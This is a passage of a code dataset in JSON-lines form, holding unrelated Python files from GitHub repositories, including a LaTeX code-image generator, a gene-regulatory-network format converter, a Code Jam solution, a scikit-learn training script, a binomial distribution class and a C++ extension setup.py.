in ele:\n tokens_arr.append('\\\\framebox[1.0\\width]{\\\\textcolor{red}{*token-deleted*}}\\\\\\\\')\n else:\n split_ = ele.split('!')\n t_latex = latex_dict[split_[1]]\n s_parent = arr[i - 2]\n s = s_parent.split('(')\n cond = s[1].split(')')\n cond_latex = latex_dict[cond[0]]\n tokens_arr.append('\\\\framebox[1\\width]{\\\\textcolor{red}{' + t_latex + '\\\\textcode{(' + cond_latex + ')}}}')\n else:\n if 'blank_' in ele:\n mcq_sol = ele.split('_')[1:]\n mcq_sol = ''.join(mcq_sol)\n ## add the latex script for a empty box with '?'\n if fill_in_blank:\n token_filled = mcq_sol_dict[mcq_sol]\n tokens_arr.append('\\\\framebox[1.5\\width]{' + token_filled + '}\\\\\\\\')\n else:\n tokens_arr.append('\\\\framebox[8.0\\width]{?}\\\\\\\\')\n elif 'deleted!' in ele or 'added!' in ele or 'replaced!' in ele:\n token = ele.split('!')\n if 'deleted!' in ele:\n tokens_arr.append('\\\\framebox[1.0\\width]{\\\\textcolor{red}{*token-deleted*}}\\\\\\\\')\n else:\n tokens_arr.append('\\\\framebox[1.5\\width]{\\\\textcolor{red}{' + latex_dict[token[1]][:-2] + '}}\\\\\\\\')\n else:\n tokens_arr.append(latex_dict[ele])\n\n return tokens_arr, mcq_sol\n\n\n\n\n\n\n\n\ndef get_latex_code(t_arr: list):\n\n brac_arr = []\n quad_arr = []\n script = []\n space = ''\n for i, ele in enumerate(t_arr):\n if ele == 'children[':\n if 'ifelse' in t_arr[i-1] or 'if_else' in t_arr[i-1] or 'if_only' in t_arr[i-1] or 'if' in t_arr[i-1]:\n script.append('')\n brac_arr.append('')\n quad_arr.append(space)\n space = quad_arr[-1]\n else:\n script.append('\\\\textcode{\\{}\\\\\\\\'+'\\n')\n brac_arr.append(space + '\\\\textcode{\\}}\\\\\\\\' + '\\n')\n quad_arr.append(space + '\\quad')\n space = quad_arr[-1]\n elif ele == ']':\n brac = brac_arr.pop()\n script.append(brac)\n quad_arr.pop()\n if len(quad_arr) == 0:\n space = ''\n else:\n space = quad_arr[-1]\n elif ele == '\\DSLMove\\\\\\\\' or ele == '\\DSLTurnLeft\\\\\\\\' or \\\n ele == '\\DSLTurnRight\\\\\\\\' or ele == '\\DSLPickMarker\\\\\\\\' or \\\n ele == '\\DSLPutMarker\\\\\\\\' or ele == '\\SDSLAction\\\\\\\\' or ele == '\\\\framebox[8.0\\width]{?}\\\\\\\\':\n script.append(space + ele + '\\n')\n elif 'ifelse' in ele or 'if_else' in ele or 'if_only' in ele or 'if' in ele:\n continue\n else:\n script.append(space + ele)\n\n return script\n\n\n\ndef get_full_latex_script(code_file, macros_file = MACROS):\n\n macros = get_macros(macros_file)\n ### beginning script\n begin_script = \"\\n\\\\begin{document}\\n\" \\\n \"\\\\begin{boxcode}{5cm}{0.75}{0.58}\\n\"\n\n ### ending script\n end_script = \"\\\\\\\\\\n\" \\\n \"\\end{boxcode}\\n\" \\\n \"\\end{document}\"\n\n with open(code_file, 'r') as f:\n code_json = json.load(f)\n\n clean_arr = get_string_from_json(code_json)\n c_arr = check_token_arr(clean_arr)\n t_arr, _ = get_arr_with_tokens(c_arr)\n\n code_script = get_latex_code(t_arr)\n final_script = macros + begin_script\n for ele in code_script:\n final_script = final_script + ele\n final_script = final_script + end_script\n\n return final_script\n\n\ndef get_code_image(jsoncodefile:str, codefolder:str, codeimg:str):\n script = get_full_latex_script(codefile)\n\n with open(codefolder + \"/\" + codeimg + '.tex', 'w') as fp:\n fp.write(\"%s\" % script)\n\n # generate the image file\n input_path = codefolder + '/' + codeimg + '.tex'\n os_cmd = \"pdflatex -interaction=nonstopmode -output-directory \" + codefolder + \" %s\"\n os.system(os_cmd % (input_path))\n output_path = codefolder + \"/\" + codeimg + '.jpg'\n os_cmd = \"convert -density 1200 -quality 100 \" + codefolder + \"/\" 
+ codeimg + \".pdf %s\"\n os.system(os_cmd % (output_path))\n\n print(\"Generated code image\")\n return 0\n\n","repo_name":"machine-teaching-group/aied2022_pquizsyn","sub_path":"code/utils/gen_code_image.py","file_name":"gen_code_image.py","file_ext":"py","file_size_in_byte":10926,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"38580188654","text":"import json\nimport logging\n\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport numpy as np\n\n__functions_in_ScenicSergioFlow__ = {\n \"self.open_adjacency_from_filepath_input\", \n \"self.make_grn_sergio\",\n \"self.make_one_state_grn\",\n \"self.group_interactions\",\n \"self.add_interaction\",\n \"self.trim_interactions\",\n \"self.unique_ids_master_regulons_non_regulons_pairs\",\n}\n\n\nclass ScenicSergioFlow(object):\n def __init__(self,\n filepath_to_save_interactions: str,\n filepath_to_save_regulons: str,\n select_percentile_adjacency=100,\n filepath_control_adjacency: str = None,\n filepath_disease_adjacency: str = None,\n filepath_save_gene_name_to_id_mapping: str = None\n ):\n \"\"\"\n Output Adjacencies from scenic comes as: columns are in order of {TF \\tab Target \\tab Importance}\n select_percent_adjacency: the portion of the original matrix to work with\n \"\"\"\n self.control_filepath = filepath_control_adjacency\n self.disease_filepath = filepath_disease_adjacency\n self.filepath_to_save_interactions = filepath_to_save_interactions\n self.filepath_to_save_regulons = filepath_to_save_regulons\n self.select_percent_adjacency = select_percentile_adjacency\n self.filepath_save_gene_name_to_id_mapping = filepath_save_gene_name_to_id_mapping\n self.control_adjacency = self.disease_adjacency = None\n\n self.possible_states_adjacency = {\n \"control\": self.control_adjacency,\n \"disease\": self.disease_adjacency,\n \"both\": (self.control_adjacency, self.disease_adjacency)\n }\n\n self.filepaths_states = {\"control\": self.control_filepath, \"disease\": self.disease_filepath}\n\n def open_adjacency_from_filepath_input(self, open_both=False, which_state_to_open=\"\"):\n if open_both:\n self.control_adjacency = np.load(self.control_filepath, allow_pickle=True)\n self.disease_adjacency = np.load(self.disease_filepath, allow_pickle=True)\n return self.control_adjacency, self.disease_adjacency\n else:\n if not open_both and which_state_to_open in self.possible_states_adjacency.keys():\n self.possible_states_adjacency[which_state_to_open] = np.load(\n self.filepaths_states[which_state_to_open], allow_pickle=True\n )\n return self.possible_states_adjacency[which_state_to_open]\n\n def make_grn_sergio(self, make_one_state_only=False, make_which_state=\"control\"):\n if make_one_state_only and make_which_state in self.possible_states_adjacency.keys():\n self.possible_states_adjacency[make_which_state] = self.open_adjacency_from_filepath_input(\n open_both=False, which_state_to_open=make_which_state\n )\n self.make_one_state_grn(self.possible_states_adjacency[make_which_state])\n else:\n self.control_adjacency, self.disease_adjacency = self.open_adjacency_from_filepath_input(open_both=True)\n self.make_two_states_grn()\n\n def make_one_state_grn(self, adjacency):\n if self.select_percent_adjacency is not None:\n adjacency = self.trim_interactions(adjacency)\n\n cycle_edges_tobe_removed = self._break_cycles(adjacency)\n # logging.info(\"The interactions to be ignored/removed: \", cycle_edges_tobe_removed)\n tot_unique_ids, master_regulons, non_regulons_pairs = 
self.unique_ids_master_regulons_non_regulons_pairs(\n adjacency)\n genes_ids_to_names_mapping = {k: v for v, k in enumerate(tot_unique_ids)}\n self.save_gene_ids_to_their_name_dict(genes_ids_to_names_mapping)\n interactions_tfs_per_target_gene = self.format_sergio(\n adjacency,\n master_regulons,\n genes_ids_to_names_mapping,\n cycle_edges_tobe_removed,\n )\n # interactions_tfs_per_target_gene = self.group_interactions(\n # adjacency,\n # genes_ids_to_names_mapping,\n # cycle_edges_tobe_removed\n # )\n logging.info(\"Saving the interactions to a txt file...\")\n self.save_interactions_to_txt_file(interactions_tfs_per_target_gene)\n print(\"Done formatting pySCENIC GRN to SERGIO format.\")\n\n def group_interactions(self, adjacency, genes_names_to_ids_mapping, interactions_to_ignore):\n \"\"\"\n Each tf is added to the bounded gene in the dictionary.\n Example: {gene: ([tfs],[importance_values])}.\n Each interaction is a tuple of (tf, target_gene, importance).\n \"\"\"\n interactions_tfs_per_target_gene = {}\n for interaction in adjacency:\n interactions_tfs_per_target_gene = self.add_interaction(\n interaction,\n interactions_to_ignore,\n genes_names_to_ids_mapping,\n interactions_tfs_per_target_gene\n )\n return interactions_tfs_per_target_gene\n\n @staticmethod\n def add_interaction(\n interaction,\n edges_to_ignore,\n genes_names_to_ids_mapping,\n interactions_tfs_per_target_gene\n ):\n tf, target_gene, importance = interaction\n if (tf, target_gene) in edges_to_ignore:\n print(f\"Ignored this interaction: ({tf} -> {target_gene})!\")\n return interactions_tfs_per_target_gene\n encoded_tf = genes_names_to_ids_mapping[tf]\n encoded_target_gene = genes_names_to_ids_mapping[target_gene]\n if encoded_target_gene not in interactions_tfs_per_target_gene:\n interactions_tfs_per_target_gene[encoded_target_gene] = ([encoded_tf], [importance])\n else:\n interactions_tfs_per_target_gene[encoded_target_gene][0].append(encoded_tf)\n interactions_tfs_per_target_gene[encoded_target_gene][1].append(importance)\n return interactions_tfs_per_target_gene\n\n def trim_interactions(self, adjacency):\n \"\"\"Take only the target-TF interaction above this threshold. 
The original adjacency matrix is huge\n and this simplifies the initial implementation\"\"\"\n select_until_row_x = int(len(adjacency) * (self.select_percent_adjacency / 100))\n adjacency = adjacency[:select_until_row_x]\n logging.info(f\"The trimmed adjacency has now #{select_until_row_x} interactions.\")\n return adjacency\n\n def unique_ids_master_regulons_non_regulons_pairs(self, adjacency):\n tfs = adjacency[:, 0]\n targets = adjacency[:, 1]\n regulons = np.setdiff1d(tfs, targets)\n non_regulons_pairs = [(tf, target) for tf, target in zip(tfs, targets) if tf not in regulons]\n\n tot_ids_with_replicates = np.zeros(len(tfs) + len(targets), dtype=object)\n tot_ids_with_replicates[:len(tfs)] = tfs\n tot_ids_with_replicates[len(tfs):] = targets\n tot_unique_ids = np.unique(tot_ids_with_replicates)\n print(f\"Found unique TFs/genes {len(tot_unique_ids)}.\")\n\n return tot_unique_ids, regulons, non_regulons_pairs\n\n def save_gene_ids_to_their_name_dict(self, genes_ids_to_their_names_dict):\n with open(f\"{self.filepath_save_gene_name_to_id_mapping}\", \"w\") as file:\n json.dump(genes_ids_to_their_names_dict, file)\n\n def draw_graph(self, regulons_list, non_regulons_pairs, edges) -> []:\n \"\"\"Based on https://stackoverflow.com/questions/20133479/how-to-draw-directed-graphs-using-networkx-in-python\"\"\"\n G = nx.DiGraph()\n G.add_edges_from(edges)\n\n val_map = {master_regulon: np.random.rand() for master_regulon in regulons_list}\n values = [val_map.get(node, 0.2) for node in G.nodes()]\n\n regulons_edges_red_edges = [edge for edge in G.edges() if edge not in non_regulons_pairs]\n\n plt.figure(1, figsize=(12, 12))\n pos = nx.spring_layout(G)\n nx.draw_networkx_nodes(G, pos, cmap=plt.get_cmap('jet'), node_color=values, node_size=500)\n nx.draw_networkx_labels(G, pos)\n nx.draw_networkx_edges(G, pos, edgelist=regulons_edges_red_edges, edge_color='r', arrows=True)\n nx.draw_networkx_edges(G, pos, edgelist=non_regulons_pairs, arrows=True)\n plt.title(\"Gene Regulatory network - non master regulons have the same node color\")\n\n plt.show()\n\n try:\n cycle_edge = nx.find_cycle(G)\n print(cycle_edge)\n return cycle_edge\n except nx.exception.NetworkXNoCycle:\n return []\n\n def _break_cycles(self, adjacency):\n break_cycles = False\n cycle_edges = []\n edges = [(i[0], i[1]) for i in adjacency]\n while not break_cycles:\n cycle_edges_ = self.check_if_graph_is_cycled(edges)\n cycle_edges += cycle_edges_\n edges = [(i[0], i[1]) for i in adjacency if (i[0], i[1]) not in cycle_edges]\n if not cycle_edges_:\n break_cycles = True\n return cycle_edges\n\n @staticmethod\n def check_if_graph_is_cycled(edges) -> []:\n G = nx.DiGraph()\n G.add_edges_from(edges)\n try:\n cycle_edge = nx.find_cycle(G)\n return cycle_edge\n except nx.exception.NetworkXNoCycle:\n return []\n\n def format_sergio(self, adjacency, regulons_list, genes_names_to_indices, edges_to_ignore):\n interactions_tfs_per_target_gene = {}\n visited_regulons = {k: False for k in regulons_list}\n\n with open(self.filepath_to_save_regulons, \"w\") as file_regulons:\n for interaction in adjacency:\n tf, target_gene, importance = interaction\n\n if tf in regulons_list and not visited_regulons[tf]:\n file_regulons.write(f\"{float(genes_names_to_indices[tf])},0.1,0.1\\n\") # TODO replace 0.1\n visited_regulons[tf] = True\n\n encoded_tf = genes_names_to_indices[tf]\n encoded_target_gene = genes_names_to_indices[target_gene]\n if encoded_target_gene not in interactions_tfs_per_target_gene:\n interactions_tfs_per_target_gene[encoded_target_gene] = 
([encoded_tf], [importance])\n else:\n interactions_tfs_per_target_gene[encoded_target_gene][0].append(encoded_tf)\n interactions_tfs_per_target_gene[encoded_target_gene][1].append(importance)\n\n return interactions_tfs_per_target_gene\n\n def save_interactions_to_txt_file(self, interactions_tfs_per_target_gene):\n with open(self.filepath_to_save_interactions, \"w\") as file:\n for target_gene_index, (tfs, importances) in interactions_tfs_per_target_gene.items():\n assert len(tfs) == len(importances), \"Error in creating the target genes dictionary!\"\n tf_for_target_gene_ids = \",\".join([str(float(tf)) for tf in tfs])\n importance_values_to_str = \",\".join([str(importance) for importance in importances])\n file.write(f\"{float(target_gene_index)},{float(len(tfs))},{tf_for_target_gene_ids},\"\n f\"{importance_values_to_str}\\n\")\n\n def save_master_regulons_to_txt_file(self, master_regulons_list):\n pass\n\n def make_two_states_grn(self):\n if self.select_percent_adjacency != 100:\n\n if self.select_percent_adjacency <= 0 or isinstance(self.select_percent_adjacency, float):\n raise EnvironmentError(\"'select_percent_adjacency' should be a int between [1,99]\")\n\n self.trim_interactions(by_control_adjacency=True)\n tot_unique_ids_control, master_regulons_control = self.unique_ids_and_master_regulons(self.control_adjacency)\n tot_unique_ids_d, master_regulons_d = self.unique_ids_and_master_regulons(self.disease_adjacency)\n genes_names_to_ids_mapping = {k: v for v, k in enumerate(tot_unique_ids_control)}\n self.save_gene_ids_to_their_name_dict(genes_names_to_ids_mapping, \"./scenicsergio/genes_ids_mapping.json\")\n self.interactions_tfs_per_target_gene = {}\n visited_regulons = {k: False for k in tot_unique_ids_control}\n with open(self.filepath_to_save_regulons, \"w\") as file_regulons:\n for interaction in self.control_adjacency:\n tf, target_gene, importance_c = interaction\n\n match_in_disease = (self.disease_adjacency[:, 0] == tf) & (self.disease_adjacency[:, 1] == target_gene)\n found_interaction_in_disease_too, = np.where(match_in_disease)\n\n if tf in master_regulons_control and tf in master_regulons_d and not visited_regulons[tf]:\n # if found_interaction_in_disease_too:\n _, _, importance_d = self.disease_adjacency[found_interaction_in_disease_too].squeeze()\n file_regulons.write(f\"{float(genes_names_to_ids_mapping[tf])},{importance_c},{importance_d}\\n\")\n visited_regulons[tf] = True\n break\n\n if tf not in master_regulons_control and tf not in master_regulons_d:\n if found_interaction_in_disease_too:\n _, _, importance_d = self.disease_adjacency[found_interaction_in_disease_too].squeeze()\n\n avg_importance = (importance_c + importance_d) / 2\n self.add_interaction(genes_names_to_ids_mapping, avg_importance, target_gene, tf)\n else:\n self.add_interaction(genes_names_to_ids_mapping, importance_c, target_gene, tf)\n else:\n logging.critical(\"Skipping the case when on gene is master in ony state only.\")\n print(\"Done formatting pySCENIC GRN to SERGIO format.\")\n","repo_name":"ioneliabuzatu/TOC","sub_path":"scenicsergio/scenic_sergio_flow.py","file_name":"scenic_sergio_flow.py","file_ext":"py","file_size_in_byte":13750,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23606384481","text":"import sys\r\n\r\nfp = open('small.in', 'r')\r\nout = open('output', 'w')\r\n#out = sys.stdout\r\ncases = int(fp.readline())\r\n\r\nfor case in range(cases):\r\n parms = [int(x) for x in fp.readline().split()]\r\n sizes = 
[int(x) for x in fp.readline().split()]\r\n \r\n rides = parms[0]\r\n cap = parms[1]\r\n \r\n group = 0\r\n result = 0\r\n for x in range(rides):\r\n dentro = 0\r\n jafoi = 0\r\n primeiro = group\r\n while dentro + sizes[group] <= cap:\r\n if jafoi and group == primeiro:\r\n break\r\n# print sizes[group],\r\n dentro += sizes[group]\r\n result += sizes[group]\r\n group = (group + 1) % len(sizes)\r\n jafoi = 1\r\n# print\r\n \r\n out.write('Case #' + str(case + 1) + ': ' + str(result) + '\\n')\r\n case += 1\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_55/755.py","file_name":"755.py","file_ext":"py","file_size_in_byte":823,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"22906817578","text":"from sklearn import *\nfrom process_data import *\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.linear_model import LogisticRegression\n\ndef train_test_model(name, m1, X_train, Y_train, X_test, Y_test):\n# name, m1, X_train, Y_train, X_test, Y_test = args\n print(m1)\n #parameters = {'C':[1, 10], 'epsilon':[0.01,0.05,0.1],'tol':[0.01, 0.001, 0.1,0.005],'max_iter':[1000,5000,10000]}\n #teste = GridSearchCV(m1,parameters,n_jobs=-1,cv = 3)\n #teste = ml\n #teste.fit(X_train, Y_train)\n m1.fit(X_train, Y_train)\n\n y_pred = m1.predict(X_test)\n results = open('out_%s' % (name), 'w')\n results.write(\"R2 Score: %.2f\\n\" % (metrics.r2_score(Y_test, y_pred)))\n results.write(\"Explained Variance Score: %.2f\\n\" % (metrics.explained_variance_score(Y_test, y_pred)))\n results.write(\"Mean Absolute Error: %.2f\\n\" % (metrics.mean_absolute_error(Y_test, y_pred)))\n results.write(\"Mean Squared Error: %.2f\\n\" % (metrics.mean_squared_error(Y_test, y_pred)))\n results.write(\"Median Absolute Error: %.2f\\n\" % (metrics.median_absolute_error(Y_test, y_pred)))\n results.close()\n ex = pd.DataFrame(columns=['real', 'pred'])\n ex['real'] = Y_test\n ex['pred'] = y_pred\n ex.to_csv('%s.csv' % name, index=False, sep=\";\")\n externals.joblib.dump(m1, \"%s.pkl\" % name, compress=9)\n\n\nif __name__ == '__main__':\n X, Y = load_processed_data_test()\n X_train, X_test, Y_train, Y_test = cross_validation.train_test_split(X, Y, test_size=0.33, random_state=42)\n #m1 = svm.LinearSVR()\n #ml = GradientBoostingClassifier(n_estimators=5000, learning_rate=2**(-9.5), max_features='log2', max_depth=7, random_state=1, verbose=1)\n m1 = LogisticRegression(C=10.0, multi_class='multinomial', solver='lbfgs', verbose=1)\n name = \"LogisticRegression\"\n #externals.joblib.dump((X, Y, X_train, Y_train, X_test, Y_test), \"dataset.pkl\", compress=9)\n train_test_model(name, m1, X_train, Y_train, X_test, Y_test)\n","repo_name":"tatianacdemello/Teste","sub_path":"model1.py","file_name":"model1.py","file_ext":"py","file_size_in_byte":2006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3215950389","text":"import pkgutil\nimport inspect\nimport importlib\n\nfrom vizuka.dimension_reduction import (\n projector,\n pca,\n tsne,\n )\n\nfrom vizuka.plugins import dimension_reduction as projector_plugins\n\ndef list_projectors():\n \"\"\"\n List all projector available (in vizuka/plugin/dimension_reduction\n and vizuka/dimension_reduction)\n\n :return: a dict {method_name:projector_class}\n \"\"\"\n built_in_projectors = {\n 'pca':pca.PCA,\n 'tsne':tsne.tSNE,\n }\n\n extra_projectors= {}\n \n for (module_loader, 
name, ispkg) in pkgutil.iter_modules(projector_plugins.__path__):\n plugin = importlib.import_module('.plugins.dimension_reduction.'+name, 'vizuka')\n members = inspect.getmembers(plugin)\n for _, class_ in members:\n if class_ in projector.Projector.__subclasses__():\n extra_projectors[name] = class_\n\n return built_in_projectors, extra_projectors\n \n\ndef make_projector(method='tsne', **kwargs):\n \"\"\"\n Return a projector contructor\n\n :param method: the name of the algo\n :param kwargs: additional argument (e.g: perplexity for tsne)\n \"\"\"\n \n built_in_projectors, extra_projectors = list_projectors()\n available_projectors= {**built_in_projectors, **extra_projectors}\n \n projector_builder = available_projectors.get(method, None)\n \n return projector_builder\n","repo_name":"0011001011/vizuka","sub_path":"vizuka/dimension_reduction/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":108,"dataset":"github-code","pt":"61"} +{"seq_id":"34585519829","text":"from neomodel import (db, StructuredNode, StringProperty, UniqueIdProperty, UniqueProperty, RelationshipTo)\nfrom .nodeutils import NodeUtils\n\n\nclass Assumption(StructuredNode, NodeUtils):\n uid = UniqueIdProperty()\n name = StringProperty(unique_index=True)\n description = StringProperty()\n\n algorithms = RelationshipTo('.dm_algorithm.DataMiningAlgorithm', 'IS_ASSUMPTION_OF')\n\n @property\n def serialize(self):\n return {\n 'node_properties': {\n 'node_id': self.node_id,\n 'name': self.name,\n 'description': self.description\n }\n }\n\n @property\n def serialize_connections(self):\n return [\n {\n 'nodes_type': 'Algorithm',\n 'nodes_related': self.serialize_relationships(self.algorithms.all())\n }\n ]\n","repo_name":"lidija-jovanovska/ml-algorithms-annotator","sub_path":"web-annotator/controller/api/models/assumption.py","file_name":"assumption.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"19607626723","text":"'''\nCreated on Sep 19, 2015\n\n@author: Philip Schulz\n'''\n\nfrom random import Random, shuffle\nfrom math import factorial\n\nclass BinomialDistribution(object):\n '''\n This class implements the binomial distribution with parameters n and theta, where n\n is the number i.i.d. 
random binary decisions and theta is the probability for a success.\n Successes and failures can be arbitrary objects.\n '''\n\n success = None\n failure = None\n n = None\n theta = None\n random_generator = None\n\n def __init__(self, success, failure, n = 10, theta = 0.5):\n '''\n Constructor\n \n @param success: the value of a success\n @param failure: the value of a failure\n @param n: the value of the parameter n\n @param theta: the value of the parameter theta\n @raise ValueError: if theta is outside [0,1] or n <= 0 \n '''\n \n self.set_n(n)\n self.set_theta(theta)\n self.success = success\n self.failure = failure\n self.random_generator = Random()\n \n def set_n(self, n):\n '''\n Set a new value for the parameter n.\n \n @param n: the new value for n\n @raise ValueError: if n <= 0\n '''\n \n if n < 1:\n raise ValueError(\"The argument n needs to be strictly greater than 0.\")\n \n self.n = n\n \n \n def set_theta(self, theta):\n '''\n Set a new value for the parameter theta.\n \n @param theta: the new value for the parameter theta\n @raise ValueError: if theta is outside [0,1]\n '''\n \n if theta < 0 or theta > 1:\n raise ValueError(\"The argument theta needs to lie in [0,1].\")\n \n self.theta = theta\n \n def compute_probability(self, k):\n '''\n Compute the probability of obtaining exactly k successes.\n \n @param k: the number of successes\n @return The probability of obtaining exactly the specified number of successes\n @raise ValueError: if k > n or k < 0\n '''\n \n if k > self.n:\n raise ValueError(\"There cannot be more successes than draws. Decrease k!\")\n elif k < 0:\n raise ValueError(\"The number of successes has to be positive.\")\n \n binomial_coefficient = factorial(self.n)/(factorial(k)*factorial(self.n-k))\n return binomial_coefficient*(self.theta**k)*((1-self.theta)**(self.n-k))\n \n def sample_with_k_successes(self, k):\n '''\n Randomly sample an outcome with exactly k successes.\n \n @param k: the number of successes\n @return: A randomly sampled outcome with exactly k successes.\n @raise ValueError: if k > n or k < 0\n '''\n \n if k > self.n:\n raise ValueError(\"There cannot be more successes than draws. 
Decrease k!\")\n elif k < 0:\n raise ValueError(\"The number of successes has to be positive.\")\n \n sampled_value = list()\n for i in xrange(k):\n sampled_value.append(self.success)\n for i in xrange(self.n-k):\n sampled_value.append(self.failure)\n \n shuffle(sampled_value)\n return sampled_value\n \n def sample(self):\n '''\n Samples a random outcome from this distribution.\n \n @return A randomly sampled outcome from this distribution in form of a list.\n '''\n \n threshold = self.random_generator.random()\n total = 0\n for k in xrange(self.n+1):\n total += self.compute_probability(k)\n if total > threshold:\n return self.sample_with_k_successes(k)\n \n def sample_list(self, m):\n '''\n Samples m random outcomes from this distribution.\n \n @param m: The number of outcomes to be sampled\n @return A list of k random outcomes from this distribution.\n @raise ValueError: if m < 1\n '''\n \n result = list()\n \n for i in xrange(m):\n result.append(self.sample())\n \n return result","repo_name":"BasicProbability/PythonCode_Fall2015","sub_path":"src/week4_debugging_and_testing/distributions_solution.py","file_name":"distributions_solution.py","file_ext":"py","file_size_in_byte":4132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41711846438","text":"\"\"\"\n Contains widgets used for Slumber.\n\"\"\"\nfrom django import forms\nfrom django.contrib.admin.widgets import AdminURLFieldWidget\n\nfrom slumber.connector.api import _InstanceProxy, get_instance\nfrom slumber.scheme import from_slumber_scheme\nfrom slumber.server import get_slumber_services\n\n\nclass RemoteForeignKeyWidget(forms.TextInput):\n \"\"\"A widget that allows the URL to be edited.\n \"\"\"\n def render(self, name, value, **kw):\n if isinstance(value, basestring):\n return super(RemoteForeignKeyWidget, self).render(\n name, value, **kw)\n else:\n return super(RemoteForeignKeyWidget, self).render(\n name, value._url if value else None, **kw)\n\n\nclass RemoteForeignKeyField(forms.Field):\n \"\"\"A simple widget that allows the URL for the remote object to be\n seen and edited.\n \"\"\"\n def __init__(self, max_length=None, verify_exists=True,\n model_url=None, **kwargs):\n assert model_url, \"RemoteForiegnKeyField must be passed a model_url\"\n self.max_length = max_length\n self.model_url = model_url\n self.verify_exists = verify_exists\n default = {'widget': RemoteForeignKeyWidget}\n default.update(kwargs)\n if default['widget'] == AdminURLFieldWidget:\n # We have to ignore a request for admin's broken widget\n default['widget'] = RemoteForeignKeyWidget\n super(RemoteForeignKeyField, self).__init__(**default)\n\n def clean(self, value):\n if not value:\n if self.required:\n raise forms.ValidationError('This field is required')\n return None\n elif isinstance(value, _InstanceProxy):\n return value\n else:\n try:\n model_url = from_slumber_scheme(\n self.model_url, get_slumber_services())\n instance = get_instance(model_url, value, None)\n unicode(instance)\n except AssertionError:\n raise forms.ValidationError(\"The remote object doesn't exist\")\n return instance\n","repo_name":"hotkit/django-slumber","sub_path":"slumber/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2102,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"61"} +{"seq_id":"3893268180","text":"from setuptools import setup, Extension, find_packages\nfrom setuptools.dist import Distribution\nfrom pkg_resources import 
resource_string\nimport os\nimport platform\n\n\nclass BinaryDistribution(Distribution):\n \"\"\"\n Subclass the setuptools Distribution to flip the purity flag to false.\n See http://lucumr.pocoo.org/2014/1/27/python-on-wheels/\n \"\"\"\n def is_pure(self):\n # TODO: verify whether this is still necessary in Python v2.7\n return False\n\n\nSRC_ROOT = 'phraser/'\n\n\n# 1. Base flags.\n# 2. Max out warnings.\n# 3. Disable some warnings.\n# 4. Disable more warnings for LAPOS.\nCOMMON_BASE_FLAGS = (\"\"\"\n -std=c++11\n -O3\n -I%s\n\"\"\" % SRC_ROOT).split()\n\n\nCOMMON_LAPOS_FLAGS = \"\"\"\n -Wno-sign-conversion\n -Wno-old-style-cast\n -Wno-sign-compare\n -Wno-float-equal\n -Wno-unused-variable\n -Wno-unused-parameter\n -Wno-unused-function\n\"\"\".split()\n\n\nCLANG_BASE_FLAGS = \"\"\"\n -Wall\n -Wextra\n -Wpedantic\n\"\"\".split()\n\n\nCLANG_DISABLE_FLAGS = \"\"\"\n -Wno-padded\n -fcolor-diagnostics\n -ferror-limit=5\n -Wno-c++98-compat-pedantic\n -Wno-covered-switch-default\n -Wno-weak-vtables\n -Wno-global-constructors\n -Wno-implicit-fallthrough\n\"\"\".split()\n\n\nCLANG_LAPOS_FLAGS = \"\"\"\n -Wno-exit-time-destructors\n -Wno-shorten-64-to-32\n\"\"\".split()\n\n\n# C++ source naming convention:\n# * Main files end with .cpp\n# * Everything else ends with .cc\ndef find_cc_files(root_dir):\n ff = []\n for root, dirs, files in os.walk(root_dir):\n for name in files:\n if name.endswith('.cc'):\n f = os.path.join(root, name)\n ff.append(f)\n return ff\n\n\nUBUNTU_VERSION_F = '/etc/lsb-release'\nRELEASE_FIELD_NAME = 'DISTRIB_RELEASE'\n\n\ndef get_ubuntu_release():\n with open(UBUNTU_VERSION_F) as f:\n lines = f.readlines()\n kk_vv = map(lambda s: s.split('='), lines)\n k2v = dict(kk_vv)\n release = k2v[RELEASE_FIELD_NAME]\n nn = map(int, release.split('.'))\n assert len(nn) == 2\n return nn\n\n\ndef is_ubuntu_old():\n try:\n major, minor = get_ubuntu_release()\n except:\n return False # Guess it's recent.\n\n return major < 13 # Compat required.\n\n\nif platform.system() == 'Darwin':\n os.environ['CC'] = 'clang++'\n os.environ['CXX'] = 'clang++'\nelse:\n if is_ubuntu_old():\n os.environ['CC'] = 'g++-4.7'\n os.environ['CXX'] = 'g++-4.7'\n else:\n os.environ['CC'] = 'g++'\n os.environ['CXX'] = 'g++'\n\n\nif os.environ.get('CXX') == 'clang++':\n FLAGS = COMMON_BASE_FLAGS + CLANG_BASE_FLAGS + COMMON_LAPOS_FLAGS + \\\n CLANG_DISABLE_FLAGS + CLANG_LAPOS_FLAGS\nelse:\n FLAGS = COMMON_BASE_FLAGS + COMMON_LAPOS_FLAGS\n\n\nphraser = Extension(\n 'phraser.phraserext',\n sources=find_cc_files(SRC_ROOT) + ['phraser/cc/pyext/phraserext.cpp'],\n extra_compile_args=FLAGS,\n include_dirs=[SRC_ROOT, '.'],\n libraries=['boost_regex'],\n library_dirs=['/usr/local/lib/'],\n)\n\nsetup(\n name='phraser',\n version='0.1.10',\n author='James Knighton',\n author_email='iamknighton@gmail.com',\n description='Detects phrases in English text',\n license='MIT',\n packages=find_packages(exclude=['tests', 'scripts']),\n ext_modules=[phraser],\n long_description=resource_string(__name__, 'README.rst'),\n distclass=BinaryDistribution,\n)\n","repo_name":"knighton/phraser","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":3312,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"26223523017","text":"#1\r\na 